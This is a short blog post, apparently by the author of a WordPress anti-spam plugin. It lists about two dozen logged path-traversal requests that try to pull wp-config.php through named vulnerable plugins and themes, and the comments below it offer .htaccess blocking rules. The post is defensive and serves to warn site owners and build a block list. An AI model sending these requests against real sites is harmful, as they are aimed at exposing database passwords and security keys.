wp-config.php exploit attempts

I got a whole bunch of new exploit attempts this weekend. I’ve added these to the 6.00 Stop Spammer plugin so I should be protected.

The exploit uses insecure plugins and themes to try to download your wp-config file. The file has your security keys and database user and password, so there is potentially some significant stuff there.

watch out for these:

/wp-content/force-download.php?file=../wp-config.php HTTP/1.1
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php HTTP/1.1
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1
/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php HTTP/1.1
/wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php HTTP/1.1
/wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/jarida/download.php?uri=../../../wp-config.php HTTP/1.1
/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1
/wp-content/themes/markant/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/tess/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/yakimabait/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php HTTP/1.1

 

3 Responses to “wp-config.php exploit attempts”

  1. mreshane says:

    my server didn’t allow .htaccess, im using nginx (a newbies here), how to change other then .htaccess?

  2. Ward says:

    just noticed this did not paste correctly

    Order deny,allow

    #add my management IP address
    allow from x.y.z.n
    Deny from all

    Allow from all

  3. Ward says:

    try a .htaccess file to the wp-content file. .php should never be served from wp-content and below only content: images, js, css, and others…

    Order deny,allow

    Deny from all

    Allow from all

Leave a Reply